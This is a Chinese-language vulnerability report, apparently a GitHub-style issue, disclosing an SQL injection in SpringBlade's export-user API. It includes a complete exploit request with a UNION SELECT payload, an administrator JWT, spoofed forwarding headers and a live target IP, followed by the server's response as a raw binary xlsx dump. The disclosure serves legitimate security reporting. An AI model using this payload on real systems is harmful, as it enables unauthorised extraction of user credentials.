SQL注入问题

一、该问题的重现步骤是什么？

1. 安全扫描

2. 访问框架接口

3.发现被sql注入

SpringBlade 框架后台 export-user 路径 SQL注入漏洞，攻击者可将用户名、密码等敏感信息通过excel导出。

二、你期待的结果是什么？实际看到的又是什么？

三、你正在使用的是什么产品，什么版本？在什么操作系统上？

四、请提供详细的错误堆栈信息，这很重要。

五、若有更多详细信息，请在下面提供。

构造请求

漏洞利用点:

https://113.249.153.183:8829/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&account+like+?+and+is_deleted%3d?)union+select+1,2,3,user(),5,6,7,8,from_unixtime(1451997924),10,11,12--a=1

攻击Payload:

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&account+like+?+and+is_deleted%3d?)union+select+1,2,3,user(),5,6,7,8,from_unixtime(1451997924),10,11,12--a=1 HTTP/1.1

Host: 113.249.153.183:8829

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36

Connection: close

'user-Agent: Chrome/103.0.0.0 Safari/537.36'

X-Forwarded-For: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Remote-IP: 127.0.0.1

Accept-Encoding: gzip

目标响应结果:

HTTP/1.1 200 OK

Connection: close

Transfer-Encoding: chunked

Content-Disposition: attachment;filename=%E7%94%A8%E6%88%B7%E6%95%B0%E6%8D%AE20240729105346.xlsx

Content-Type: application/vnd.ms-excel;charset=UTF-8

Date: Mon, 29 Jul 2024 02:53:47 GMT

Server: nginx/1.15.8

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

PK  �V�X               _rels/.rels���j�0�_���8�`�Q��2�m��4[ILb��ږ���.[K

�($}��v?�I�Q.���uӂ�h���x>=��@��p�H"�~�}� �n����*"�H�׺؁�����8�Z�^'�#��7m{��O�3���G�u�ܓ�'��y|a�����D� ����l_EYȾ� ����vql3�ML��eh���*����\3�Y0���oJ׏� :��^���}PK��z��   I  PK  �V�X               [Content_Types].xml�S�n�0����*6�PU�C���\{�X�%����]8�R�

q�cfgfW�d�q�ZCB|��|�*�*h㻆},^�{Va�^K<4�6�N�XQ�dž�9�!P��$��҆�d�c�D�j);��ѝP�g���E�M'O�ʕ�����H7L�h���R���G��^�'�{���zސʮB��3�˙��h.�h�W�жF�j娄CQՠ똈���}ιL�U:D�����%އ����,�B����[� �� ;˱� �{N��~��X��p�ykOL��kN�V����ܿBZ~����q�� �ar��{O�PKz��q;    PK  �V�X               docProps/app.xmlM��

�0D���ro�z�4� �'{����MHV�盓z���T��E�1e�����Ɇ�ѳ����:�No7jH!bb�Y��V����������T�)$o����0M��9ؗGb�7�pe��*~�R�>��Y�EB���nW������ PK6n�!�   �   PK  �V�X               docProps/core.xmlm��J�0F_�依�]W

mQ�W�B2����$���M�ZA�K��9L�jsPC����F�$�(IP#{���a�M�H�גFcM�!��� �p��Ez�I�hτ�I�e ^t���"�c�b��!^]��W�"��Aa���0����R,J���Y ��

u��g9�������B|�P�8fc9sq��no����^O_H���f�!(�(`���F�����j�%MA�UJO��|OvR�����_����l\s�0��]O��\����OPK8[l  �  PK  �V�X               xl/sharedStrings.xml=�A

�0 ��{��D�i�/��tm�&f7�����0Ì�7mꃕc&���B�y��Zx>����~72����X�I��nx�s�["��5�����R7�\���u�\*����M��9��"��~PKh���y   �   PK  �V�X            

   xl/styles.xml�TK��0�#q�{&ݡA#�d$Fj�z��;�$��'�=��

,�7�6p�v~��f�lb����r���� ���V%�^l(U놫������z��p�,���ʕ��޼�2W� ������J�qi���qA$E�o6�3ɸ�U�Nr/�#�>)_�

ͪ��jAr���p��� -Ć�Zm W

Д�2`�IH�k&�����$�������)���������/Q5��K������qp�Å�/�� �

ü��� ��p6PR��hy��fo�Yv~��i��?�#��~��<f0 g=""/>